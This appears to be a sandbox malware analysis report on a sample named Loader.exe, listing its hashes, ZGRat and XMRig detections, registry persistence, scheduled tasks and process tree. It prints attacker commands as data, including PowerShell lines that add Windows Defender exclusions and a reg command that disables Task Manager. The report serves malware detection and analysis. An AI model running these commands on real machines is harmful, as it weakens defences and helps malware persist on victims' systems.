Analysis
-
max time kernel
1799s -
max time network
1798s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
14-05-2024 11:35
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
Loader.exe
Resource
win10v2004-20240426-en
General
-
Target
Loader.exe
-
Size
353KB
-
MD5
da4a981460566d93b7c25f1527c5d321
-
SHA1
ad0dc4e6192057d2f80b080741cdfea83c399a0b
-
SHA256
fbfa20ca6337fbe8f71ebab5e3328af667b9e9f4ad56ec7669e502f19e4f6905
-
SHA512
06d57ca29fb36c3c17f275485a69e58d3bb51a543f7dc96945122ad2108967a7995373ead8ce86eb9efc8131e1ae41dd2ac62cd02acb1933eac494e1ba1c6c93
-
SSDEEP
6144:ujwCtJxxb+fFgfWNIQudUChHCDomqrnBTcqRVhh69NhSzN+9Im:ujwC/xxpONIFFHCDVqpcqpc9zZO
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral1/files/0x000900000001ab49-7.dat family_zgrat_v1 behavioral1/files/0x000900000001ac35-29.dat family_zgrat_v1 behavioral1/memory/4088-30-0x0000000000D10000-0x00000000010B2000-memory.dmp family_zgrat_v1 -
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\Idle.exe\", \"C:\\blockcontainerWincrtdll\\dllhost.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\wininit.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\Idle.exe\", \"C:\\blockcontainerWincrtdll\\dllhost.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\wininit.exe\", \"C:\\Recovery\\WindowsRE\\Utility.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\Idle.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\Idle.exe\", \"C:\\blockcontainerWincrtdll\\dllhost.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\PrintHood\\Idle.exe\", \"C:\\blockcontainerWincrtdll\\dllhost.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\cmd.exe\"" Sessionperf.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 700 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4136 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 500 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2348 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1860 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4936 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3220 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4852 1996 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4528 1996 schtasks.exe 81 -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1360-565-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-564-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-570-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-571-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-568-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-567-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-569-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-595-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-596-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-630-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-631-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1360-632-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1196 powershell.exe 2900 powershell.exe 828 powershell.exe 4516 powershell.exe 5012 powershell.exe 2712 powershell.exe 1460 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
pid Process 2740 Checker.exe 1344 Utility.exe 4088 Sessionperf.exe 3324 Utility.exe 3104 lhhsgwktkatl.exe 4484 Idle.exe 4412 wininit.exe 4052 dllhost.exe 1724 Utility.exe 4016 cmd.exe 2192 Idle.exe 2224 wininit.exe 2528 dllhost.exe 4740 Utility.exe 1244 Idle.exe 4972 cmd.exe 164 wininit.exe 1524 Idle.exe 1952 dllhost.exe 1732 Utility.exe 1580 cmd.exe 4616 wininit.exe 4544 Idle.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1360-565-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-564-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-570-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-571-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-568-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-567-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-569-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-563-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-561-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-559-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-560-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-562-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-595-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-596-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-630-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-631-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1360-632-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Utility = "\"C:\\Recovery\\WindowsRE\\Utility.exe\"" Sessionperf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\PrintHood\\Idle.exe\"" Sessionperf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\blockcontainerWincrtdll\\dllhost.exe\"" Sessionperf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\MSBuild\\Microsoft\\cmd.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Reference Assemblies\\wininit.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Utility = "\"C:\\Recovery\\WindowsRE\\Utility.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\PrintHood\\Idle.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\blockcontainerWincrtdll\\dllhost.exe\"" Sessionperf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\MSBuild\\Microsoft\\cmd.exe\"" Sessionperf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Reference Assemblies\\wininit.exe\"" Sessionperf.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe lhhsgwktkatl.exe File created \??\c:\Windows\System32\CSC48781723969843A394A0FF2566F5176C.TMP csc.exe File created \??\c:\Windows\System32\leoba4.exe csc.exe File opened for modification C:\Windows\system32\MRT.exe Utility.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3104 set thread context of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 set thread context of 1360 3104 lhhsgwktkatl.exe 151 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\MSBuild\Microsoft\cmd.exe Sessionperf.exe File created C:\Program Files\MSBuild\Microsoft\ebf1f9fa8afd6d Sessionperf.exe File created C:\Program Files\Reference Assemblies\wininit.exe Sessionperf.exe File created C:\Program Files\Reference Assemblies\56085415360792 Sessionperf.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3744 sc.exe 4128 sc.exe 2120 sc.exe 1428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 700 schtasks.exe 2204 schtasks.exe 2348 schtasks.exe 4264 schtasks.exe 4492 schtasks.exe 3636 schtasks.exe 404 schtasks.exe 4852 schtasks.exe 500 schtasks.exe 3332 schtasks.exe 3220 schtasks.exe 4528 schtasks.exe 4136 schtasks.exe 1860 schtasks.exe 4936 schtasks.exe -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings Checker.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings Sessionperf.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4988 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe 4088 Sessionperf.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3324 Utility.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 204 Loader.exe Token: SeDebugPrivilege 4088 Sessionperf.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeIncreaseQuotaPrivilege 5012 powershell.exe Token: SeSecurityPrivilege 5012 powershell.exe Token: SeTakeOwnershipPrivilege 5012 powershell.exe Token: SeLoadDriverPrivilege 5012 powershell.exe Token: SeSystemProfilePrivilege 5012 powershell.exe Token: SeSystemtimePrivilege 5012 powershell.exe Token: SeProfSingleProcessPrivilege 5012 powershell.exe Token: SeIncBasePriorityPrivilege 5012 powershell.exe Token: SeCreatePagefilePrivilege 5012 powershell.exe Token: SeBackupPrivilege 5012 powershell.exe Token: SeRestorePrivilege 5012 powershell.exe Token: SeShutdownPrivilege 5012 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeSystemEnvironmentPrivilege 5012 powershell.exe Token: SeRemoteShutdownPrivilege 5012 powershell.exe Token: SeUndockPrivilege 5012 powershell.exe Token: SeManageVolumePrivilege 5012 powershell.exe Token: 33 5012 powershell.exe Token: 34 5012 powershell.exe Token: 35 5012 powershell.exe Token: 36 5012 powershell.exe Token: SeIncreaseQuotaPrivilege 2712 powershell.exe Token: SeSecurityPrivilege 2712 powershell.exe Token: SeTakeOwnershipPrivilege 2712 powershell.exe Token: SeLoadDriverPrivilege 2712 powershell.exe Token: SeSystemProfilePrivilege 2712 powershell.exe Token: SeSystemtimePrivilege 2712 powershell.exe Token: SeProfSingleProcessPrivilege 2712 powershell.exe Token: SeIncBasePriorityPrivilege 2712 powershell.exe Token: SeCreatePagefilePrivilege 2712 powershell.exe Token: SeBackupPrivilege 2712 powershell.exe Token: SeRestorePrivilege 2712 powershell.exe Token: SeShutdownPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeSystemEnvironmentPrivilege 2712 powershell.exe Token: SeRemoteShutdownPrivilege 2712 powershell.exe Token: SeUndockPrivilege 2712 powershell.exe Token: SeManageVolumePrivilege 2712 powershell.exe Token: 33 2712 powershell.exe Token: 34 2712 powershell.exe Token: 35 2712 powershell.exe Token: 36 2712 powershell.exe Token: SeIncreaseQuotaPrivilege 4516 powershell.exe Token: SeSecurityPrivilege 4516 powershell.exe Token: SeTakeOwnershipPrivilege 4516 powershell.exe Token: SeLoadDriverPrivilege 4516 powershell.exe Token: SeSystemProfilePrivilege 4516 powershell.exe Token: SeSystemtimePrivilege 4516 powershell.exe Token: SeProfSingleProcessPrivilege 4516 powershell.exe Token: SeIncBasePriorityPrivilege 4516 powershell.exe Token: SeCreatePagefilePrivilege 4516 powershell.exe Token: SeBackupPrivilege 4516 powershell.exe Token: SeRestorePrivilege 4516 powershell.exe Token: SeShutdownPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeSystemEnvironmentPrivilege 4516 powershell.exe Token: SeRemoteShutdownPrivilege 4516 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3324 Utility.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 204 wrote to memory of 2740 204 Loader.exe 74 PID 204 wrote to memory of 2740 204 Loader.exe 74 PID 204 wrote to memory of 2740 204 Loader.exe 74 PID 2740 wrote to memory of 1616 2740 Checker.exe 75 PID 2740 wrote to memory of 1616 2740 Checker.exe 75 PID 2740 wrote to memory of 1616 2740 Checker.exe 75 PID 204 wrote to memory of 1344 204 Loader.exe 76 PID 204 wrote to memory of 1344 204 Loader.exe 76 PID 1616 wrote to memory of 2108 1616 WScript.exe 77 PID 1616 wrote to memory of 2108 1616 WScript.exe 77 PID 1616 wrote to memory of 2108 1616 WScript.exe 77 PID 2108 wrote to memory of 4988 2108 cmd.exe 79 PID 2108 wrote to memory of 4988 2108 cmd.exe 79 PID 2108 wrote to memory of 4988 2108 cmd.exe 79 PID 2108 wrote to memory of 4088 2108 cmd.exe 80 PID 2108 wrote to memory of 4088 2108 cmd.exe 80 PID 4088 wrote to memory of 1988 4088 Sessionperf.exe 85 PID 4088 wrote to memory of 1988 4088 Sessionperf.exe 85 PID 1988 wrote to memory of 4148 1988 csc.exe 87 PID 1988 wrote to memory of 4148 1988 csc.exe 87 PID 4088 wrote to memory of 1196 4088 Sessionperf.exe 100 PID 4088 wrote to memory of 1196 4088 Sessionperf.exe 100 PID 4088 wrote to memory of 1460 4088 Sessionperf.exe 101 PID 4088 wrote to memory of 1460 4088 Sessionperf.exe 101 PID 4088 wrote to memory of 2712 4088 Sessionperf.exe 102 PID 4088 wrote to memory of 2712 4088 Sessionperf.exe 102 PID 4088 wrote to memory of 5012 4088 Sessionperf.exe 103 PID 4088 wrote to memory of 5012 4088 Sessionperf.exe 103 PID 4088 wrote to memory of 4516 4088 Sessionperf.exe 104 PID 4088 wrote to memory of 4516 4088 Sessionperf.exe 104 PID 4088 wrote to memory of 2596 4088 Sessionperf.exe 110 PID 4088 wrote to memory of 2596 4088 Sessionperf.exe 110 PID 2596 wrote to memory of 4068 2596 cmd.exe 112 PID 2596 wrote to memory of 4068 2596 cmd.exe 112 PID 2596 wrote to memory of 2084 2596 cmd.exe 113 PID 2596 wrote to memory of 2084 2596 cmd.exe 113 PID 2596 wrote to memory of 3324 2596 cmd.exe 115 PID 2596 wrote to memory of 3324 2596 cmd.exe 115 PID 2948 wrote to memory of 4448 2948 cmd.exe 132 PID 2948 wrote to memory of 4448 2948 cmd.exe 132 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 2348 3104 lhhsgwktkatl.exe 145 PID 3104 wrote to memory of 1360 3104 lhhsgwktkatl.exe 151 PID 3104 wrote to memory of 1360 3104 lhhsgwktkatl.exe 151 PID 3104 wrote to memory of 1360 3104 lhhsgwktkatl.exe 151 PID 3104 wrote to memory of 1360 3104 lhhsgwktkatl.exe 151 PID 3104 wrote to memory of 1360 3104 lhhsgwktkatl.exe 151 PID 5084 wrote to memory of 3664 5084 cmd.exe 152 PID 5084 wrote to memory of 3664 5084 cmd.exe 152 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockcontainerWincrtdll\SFUqxLlNpV20NJ9uCnUYCbrkrl1WOe98n.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\blockcontainerWincrtdll\TudTneFnbF0PE5UTQ8BUoLqStO6.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:4988
-
-
C:\blockcontainerWincrtdll\Sessionperf.exe"C:\blockcontainerWincrtdll/Sessionperf.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pdz4ds32\pdz4ds32.cmdline"6⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A41.tmp" "c:\Windows\System32\CSC48781723969843A394A0FF2566F5176C.TMP"7⤵PID:4148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\Idle.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\blockcontainerWincrtdll\dllhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\cmd.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
